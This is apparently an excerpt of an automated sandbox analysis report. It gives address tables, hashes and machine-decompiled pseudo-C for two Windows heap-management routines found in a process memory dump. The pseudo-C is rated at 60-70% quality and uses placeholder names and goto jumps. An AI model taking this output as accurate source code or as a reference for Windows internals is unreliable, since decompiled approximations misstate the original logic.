0x1e3bdc21
0x1e3bdc21
0x1e3bdc23
0x1e3bdc23
0x1e3bdc26
0x1e3bdc29
0x1e3bdc2b
0x00000000
0x00000000
0x1e3bdc31
0x1e3bdc34
0x1e3bdc36
0x1e3bdcbf
0x1e3bdcbf
0x1e3bdcc2
0x00000000
0x1e3bdc3c
0x1e3bdc41
0x1e3bdc43
0x00000000
0x1e3bdc45
0x1e3bdc45
0x1e3bdc47
0x00000000
0x1e3bdc4d
0x1e3bdc4d
0x1e3bdc50
0x1e3bdc52
0x1e3bdc55
0x1e3bdcfa
0x1e3bdcfe
0x1e3bdd08
0x1e3bdd0a
0x1e3bdd0c
0x00000000
0x1e3bdd12
0x1e3bdd15
0x1e3bdd2d
0x1e3bdd2f
0x1e3bdd32
0x1e3bdd35
0x00000000
0x1e3bdd35
0x1e3bdc5b
0x1e3bdc5b
0x1e3bdc5e
0x1e3bdc61
0x1e3bdc64
0x1e3bdc67
0x1e3bdc67
0x1e3bdc6a
0x1e3bdc6c
0x1e3bdc8e
0x1e3bdc8e
0x1e3bdc91
0x1e3bdc93
0x1e3bdcce
0x1e3bdcce
0x1e3bdc95
0x1e3bdc9c
0x1e3bdc6e
0x1e3bdc72
0x1e3bdc75
0x1e3bdc77
0x1e3bdc79
0x1e40b551
0x1e40b551
0x00000000
0x1e3bdc7f
0x1e3bdc7f
0x1e3bdc81
0x00000000
0x1e3bdc83
0x1e3bdc86
0x1e3bdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3bdc88
0x1e3bdc81
0x1e3bdc79
0x1e3bdc6c
0x1e3bdc55
0x1e3bdc47
0x1e3bdc43
0x00000000
0x1e3bdc36
0x1e3bdc23
0x00000000
0x1e3bdbff
0x1e3bdbf1
0x1e3bdbdf
0x1e3bdb8f
0x1e3bdb92
0x1e3bdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3bdb95
0x1e3bdb8d
0x1e3bdb85
0x1e3bdb74
0x1e3bdc9f
0x1e3bdca2
0x1e3bdcb0
0x1e3bdcb0
0x1e3bdad1
0x1e40b4e5
0x1e40b4c8
0x00000000
0x00000000
0x00000000
0x1e3bd831
0x1e3bd80d
0x00000000
0x1e3bd800
0x1e40b47f
0x1e40b485
0x00000000
0x1e40b485
0x1e3bd665
0x1e3bd652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3BD898

Strings

P@l, xrefs: 1E3BD69D
@*l, xrefs: 1E3BD8CE

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: @*l$P@l
API String ID: 3446177414-3556991668
Opcode ID: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
Instruction ID: 990119460426a5bba8234111266570bc9a48462a151cc847a07367bce9c12197
Opcode Fuzzy Hash: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
Instruction Fuzzy Hash: BEE1D634A00359CFDB24CF15C998BA9B7B6BF45314F4143AAD80AA7790D734AD85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CA830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E1E3CA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1e498748 - 1;
					if( *0x1e498748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
									_t260 = _t257 + 4;
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E1E3AB150();
								_t257 = _t260 + 4;
								__eflags =  *0x1e497bc8;
								if(__eflags == 0) {
									E1E462073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E1E46A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E1E3FD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E1E3CAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E1E46A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E1E46A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1e498748 - 1;
					if( *0x1e498748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E1E3AB150();
							} else {
								E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E1E3AB150();
							__eflags =  *0x1e497bc8;
							if(__eflags == 0) {
								_t131 = E1E462073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x1e3ca83a
0x1e3ca83c
0x1e3ca83e
0x1e3ca841
0x1e3ca844
0x1e3ca84a
0x1e3caa53
0x1e3caa59
0x1e3caa59
0x1e3ca858
0x1e3ca85e
0x1e3caaf5
0x1e3caafc
0x1e41229e
0x1e4122a2
0x1e4122a8
0x1e4122b3
0x1e4122b5
0x1e4122bb
0x1e4122c1
0x1e4122c5
0x1e4122e6
0x1e4122eb
0x1e4122f0
0x1e4122c7
0x1e4122dc
0x1e4122e1
0x1e4122e1
0x1e4122f3
0x1e4122f8
0x1e4122fd
0x1e412300
0x1e412307
0x1e41230e
0x1e41230e
0x1e412313
0x1e412313
0x1e4122b5
0x1e4122a2
0x1e3caafc
0x1e3ca864
0x1e3ca869
0x1e3caa5c
0x1e3caa5e
0x1e3ca86f
0x1e3ca87f
0x1e3ca885
0x1e3ca885
0x1e3ca88b
0x1e3ca890
0x1e3ca896
0x1e3cab0c
0x1e3cab0f
0x1e3cab15
0x1e412320
0x1e412320
0x1e3cab1b
0x1e3ca89c
0x1e3ca89f
0x1e3ca8a2
0x1e3ca8a2
0x1e3ca8a5
0x1e3ca8af
0x1e3ca8b3
0x1e3ca8b8
0x1e3caa66
0x1e3ca8be
0x1e3ca8c5
0x1e3ca8c6
0x1e3ca8ce
0x1e412328
0x1e412332
0x1e412337
0x1e412337
0x1e3ca8ce
0x1e3ca8d4
0x1e3ca8d8
0x1e3ca8db
0x1e3ca8de
0x1e3ca8e1
0x1e3ca8e5
0x1e3ca8e8
0x1e3ca8f0
0x1e3ca8f3
0x1e41234c
0x1e412350
0x1e412355
0x1e412359
0x1e412359
0x1e3ca8f9
0x1e3ca901
0x1e3caae4
0x1e3caae4
0x1e3caaea
0x00000000
0x1e3ca907
0x1e3ca90a
0x1e3ca91d
0x1e3ca91d
0x00000000
0x1e3ca910
0x1e3ca910
0x1e3ca910
0x1e3ca914
0x1e3ca924
0x1e3ca924
0x1e3ca924
0x1e3ca924
0x1e3ca916
0x1e3ca91b
0x00000000
0x00000000
0x00000000
0x1e3ca91b
0x1e3ca925
0x1e3ca925
0x1e3ca932
0x1e3ca936
0x1e3ca93c
0x1e3ca93c
0x1e3ca93c
0x1e3cab22
0x1e3cab24
0x1e3cab27
0x1e3cab27
0x1e3ca942
0x1e3ca944
0x1e3caaba
0x1e3caabd
0x1e3caac0
0x1e3caac0
0x1e3caac2
0x1e3cab2f
0x1e3caac4
0x1e3caac4
0x1e3caac7
0x1e3caaca
0x1e3caacc
0x1e3caace
0x1e3caace
0x1e3caace
0x1e3caad1
0x1e3caad1
0x1e3caad7
0x1e3caad9
0x00000000
0x00000000
0x1e412361
0x1e412369
0x1e41236b
0x00000000
0x1e412371
0x00000000
0x1e412371
0x00000000
0x1e41236b
0x1e3caac0
0x1e3ca94a
0x1e3ca94a
0x1e3ca94d
0x1e3ca94d
0x1e3ca950
0x1e3ca954
0x1e412376
0x1e412380
0x1e3ca95a
0x1e3ca95a
0x1e3ca95c
0x1e3ca95f
0x1e3ca961
0x1e3ca961
0x1e3ca967
0x1e3ca96a
0x1e3ca972
0x1e3caa02
0x1e3caa06
0x1e3caa10
0x1e3caa16
0x1e3caa16
0x1e3caa1b
0x1e3caa21
0x1e3caa24
0x1e3caa27
0x1e3caa29
0x1e3caa2c
0x1e3caa32
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3ca978
0x1e3ca978
0x1e3ca97b
0x1e3ca981
0x1e3ca996
0x1e3ca998
0x1e3ca99f
0x1e3ca9a2
0x1e41238a
0x1e3ca9a8
0x1e3ca9a8
0x1e3ca9a8
0x1e3ca9aa
0x1e3ca9ad
0x1e3ca9b0
0x1e3ca9bb
0x1e3ca9be
0x1e3ca9c7
0x1e3ca9c9
0x1e3ca9c9
0x1e3ca9cc
0x1e3ca9d1
0x1e3caa6d
0x1e3caa70
0x1e3caa73
0x1e3caa75
0x1e3caa79
0x1e3caa7e
0x1e3caa82
0x1e3caa8f
0x1e3caa94
0x1e3caa96
0x1e412392
0x1e4123a1
0x1e4123a1
0x1e3caa9c
0x1e3caa9f
0x1e3caaa2
0x1e3caaa2
0x1e3caaa8
0x1e3caaab
0x1e3caaaf
0x00000000
0x1e3caab5
0x00000000
0x1e3caab5
0x1e3ca9d7
0x1e3ca9d7
0x1e3ca9da
0x1e3ca9e0
0x1e3ca9e3
0x1e3ca9e6
0x1e3ca9e9
0x1e3ca9eb
0x1e3ca9fd
0x1e3ca9fd
0x00000000
0x1e3ca9eb
0x00000000
0x00000000
0x00000000
0x1e3ca983
0x1e3ca983
0x1e3ca983
0x1e3ca987
0x1e3ca995
0x1e3ca995
0x1e3ca995
0x1e3ca995
0x1e3ca989
0x1e3ca98e
0x00000000
0x1e3ca990
0x00000000
0x1e3ca990
0x1e3ca98e
0x00000000
0x1e3ca983
0x1e3ca972
0x1e3ca90a
0x1e3caa34
0x1e3caa34
0x1e3caa40
0x1e3caa43
0x1e3caa46
0x1e3caa4d
0x1e4123ab
0x1e4123b2
0x1e4123b8
0x1e4123be
0x1e4123c3
0x1e4123c5
0x1e4123cb
0x1e4123d1
0x1e4123d5
0x1e4123f6
0x1e4123fb
0x1e4123d7
0x1e4123ec
0x1e4123f1
0x1e412403
0x1e412408
0x1e412410
0x1e412417
0x1e412422
0x1e412422
0x1e412417
0x1e4123c5
0x1e4123b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 1E412403
HEAP[%wZ]: , xrefs: 1E4122D7, 1E4123E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 1E4122F3
HEAP: , xrefs: 1E4122E6, 1E4123F6

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: e9bd3d76a90569a73bfb4cc4b03e90b19bc3aea090d531781d89bba93551aaf7
Instruction ID: ba1ccb20b88087628f1200d94e27084532ece7aabefb9cc8f4081414671f5b32
Opcode Fuzzy Hash: e9bd3d76a90569a73bfb4cc4b03e90b19bc3aea090d531781d89bba93551aaf7
Instruction Fuzzy Hash: 9FD1B074A0064A9FDB08CF69C490BAAB7F2FF48300F15876AD85A9B745E334ED46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1E46D616, Relevance: 4.7, APIs: 3, Instructions: 216
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E1E46D616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x1e49d360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x1e49610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x1e38aef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x1e49610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E1E46C70A(__ecx + 0x38, _t150);
				}
				_t79 = E1E46C5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E1E46A359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x1e49610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L1E3CFAD0(_t159 + 0x34);
					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E1E3D1710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x1e49b1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x1e496110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x1e49610c & 0x00000002;
							_v16 = _t94;
							if(( *0x1e49610c & 0x00000002) == 0) {
								L25:
								_t95 = E1E46D597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E1E46DEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x1e49b1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x1e496110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x1e496110 ^ _t159;
										__eflags = _t164;
										 *0x1e49b1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E1E3CFA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E1E3EB640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E1E46A359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}

0x1e46d625
0x1e46d629
0x1e46d62d
0x1e46d62f
0x1e46d632
0x1e46d638
0x1e46d63f
0x1e46d641
0x1e46d64c
0x1e46d64f
0x1e46d660
0x1e46d651
0x1e46d659
0x1e46d659
0x1e46d667
0x1e46d66e
0x1e46d67c
0x1e46d69a
0x1e46d6a0
0x1e46d6a5
0x1e46d6a7
0x1e46d6ad
0x1e46d6b1
0x1e46d6b2
0x1e46d6b2
0x1e46d6b8
0x1e46d6c1
0x1e46d6c4
0x1e46d6fb
0x1e46d6fd
0x1e46d6fd
0x1e46d6fe
0x1e46d701
0x1e46d703
0x1e46d706
0x1e46d70c
0x1e46d70c
0x1e46d717
0x1e46d71a
0x1e46d720
0x1e46d72d
0x1e46d722
0x1e46d727
0x1e46d729
0x1e46d729
0x1e46d731
0x1e46d76a
0x1e46d76a
0x00000000
0x1e46d733
0x1e46d749
0x1e46d751
0x1e46d755
0x1e46d75e
0x1e46d760
0x1e46d76c
0x1e46d76c
0x1e46d773
0x1e46d776
0x1e46d786
0x1e46d78c
0x1e46d791
0x1e46d793
0x1e46d796
0x1e46d796
0x1e46d799
0x1e46d79b
0x1e46d79d
0x1e46d7a1
0x1e46d7a5
0x1e46d7a5
0x1e46d7a8
0x1e46d7aa
0x1e46d7aa
0x1e46d7a1
0x1e46d7ad
0x1e46d7af
0x1e46d7d8
0x1e46d7d8
0x1e46d7db
0x1e46d7dd
0x1e46d7e4
0x1e46d7e4
0x1e46d7e4
0x1e46d7e6
0x1e46d7e8
0x1e46d7f0
0x1e46d7f0
0x1e46d7f4
0x1e46d7f9
0x1e46d7fd
0x1e46d805
0x1e46d810
0x1e46d814
0x1e46d816
0x1e46d816
0x00000000
0x1e46d7b1
0x1e46d7c2
0x1e46d7c8
0x1e46d7ca
0x1e46d7cc
0x1e46d7d2
0x1e46d7d5
0x00000000
0x1e46d7d5
0x1e46d7ce
0x1e46d818
0x1e46d818
0x1e46d81b
0x1e46d81d
0x1e46d831
0x1e46d831
0x1e46d835
0x1e46d83b
0x1e46d83d
0x1e46d83d
0x1e46d840
0x1e46d844
0x1e46d84a
0x1e46d84a
0x1e46d861
0x1e46d861
0x1e46d7af
0x1e46d778
0x1e46d77c
0x00000000
0x00000000
0x1e46d77e
0x1e46d781
0x00000000
0x1e46d781
0x1e46d757
0x00000000
0x1e46d757
0x1e46d731
0x1e46d6c6
0x1e46d6d1
0x00000000
0x00000000
0x1e46d6d6
0x1e46d6db
0x1e46d6dd
0x1e46d6e3
0x1e46d6e7
0x1e46d6e8
0x1e46d6e8
0x1e46d6ed
0x1e46d6f0
0x1e46d6f4
0x1e46d6f6
0x1e46d6f6
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E46D749
RtlDebugPrintTimes.NTDLL ref: 1E46D7C2
RtlDebugPrintTimes.NTDLL ref: 1E46D835

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e16b85c5401582505b77826aa731a4e248508cc1f3560ea82ae9fbb29566543a
Instruction ID: 28da0017c703c9088e55acef7a20415ce15c3614e2450b653e5aff999b19305d
Opcode Fuzzy Hash: e16b85c5401582505b77826aa731a4e248508cc1f3560ea82ae9fbb29566543a
